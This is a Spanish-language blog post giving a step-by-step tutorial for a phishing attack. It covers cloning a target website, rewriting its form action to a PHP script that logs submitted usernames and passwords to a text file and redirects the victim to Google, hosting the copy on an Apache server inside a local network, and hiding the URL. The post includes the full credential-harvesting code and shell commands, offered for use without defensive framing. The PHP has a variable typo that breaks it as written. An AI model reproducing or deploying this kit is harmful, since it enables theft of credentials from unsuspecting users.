Formulario sencillo para Phishing…

El phishing, conocido ataque de la fase de Gathering Information, en el que se le presenta a un usuario una página falsa para que haga el ingreso de sus datos, y sin su conocimiento estos datos son transferidos/enviados al atacante.

En este post, se hace mención a este tipo de ataque de una forma básica. Y se plantea el siguiente escenario:

Una vez seleccionada la página objetivo/victima a “falsear”, se hace una copia exacta de la misma, pero la misma incluye un formulario en php que toma los datos ingresados y los almacena en un archivo .txt. Una vez realizado esto, subir la página a un servidor web local (dentro de la red), para que sea enviado a los usuarios dentro de la red.

Archivos necesarios:

Lo que necesitamos por ahora es el código php que será el encargado de leer los datos ingresados y enviarlos a un .txt. Abrimos cualquier editor de texto y pegamos el siguiente código y le damos cualquier nombre, por ejemplo validar.php

<?php
$fichero = “infousers.txt”;
$handle = fopen($fichero, “a+”);
foreach($_POST as $user => $pass)
{
fwrite($handle, $user);
fwrite($handle, “=”);
fwrite($handle, $vpass);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);

header(“Location: http://www.google.com&#8221;);

exit;
?>

Básicamente, lo que hacemos en este código es:

Si no existe, crea el archivo “infousers.txt”. En caso de existir, guarda los datos ingresados en el formulario, sin sobreescribir. Finalmente, es redireccionado a cualquier página web, en este caso http://www.google.com, para levantar sospechas😉

Bien, ahora manos a la obra:

1- Abrir en el navegador la página objetivo, ahora guardamos la página:  ir a Archivo – Guardar página como

2- Vamos a la ubicación en la que se guardó la página, vemos que se descarga una carpeta y un archivo .html

3- Desde esta ubicación, si abrimos el archivo .html, se mostrará la misma página victima, pero no se verán las imagenes.

4- Abrimos el archivo .html con un editor de textos y buscamos la cadena “form action” de la página.

código fuente de la página
código fuente de la página

5- Localizada esta cadena, reemplazamos lo que hay dentro de las comillas por el nombre del archivo .php que habíamos creado antes.

6- Guardamos y cerramos.

Para que nuestra página pueda ser vista por otros usuarios dentro de la red, procedemos a montar nuestra página en un servidor web, en este caso, una máquina con el servidor web apache instalado:

– Si el servidor está web con las configuraciones por defecto, el archivo en el que se cargan las páginas web es: /var/www. Es en este directorio donde copiamos la carpeta que se descargo al momento de guardar la pagina vicitma [paso 2].

– Editamos el archivo “index.html”, copiando el contenido del archivo html que modificamos [paso 5, 6] en tal archivo. Mediante consola:

#cp /ruta/archivohtmlmodificado /var/www/index.html

Reiniciamos el servicio

#/etc/init.d/apache2 restart

Ahora, desde cualquier equipo de la red, ubicamos en el navegador la dirección IP del servidor web y se podrá mostrar nuestro formulario.

Nota: En esta parte se puede utilizar técnicas de ofuscación de url para “camuflar” la dirección de nuestro servidor web…

    • malaki
    • 3/07/11

    me sirvio …. 😄

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: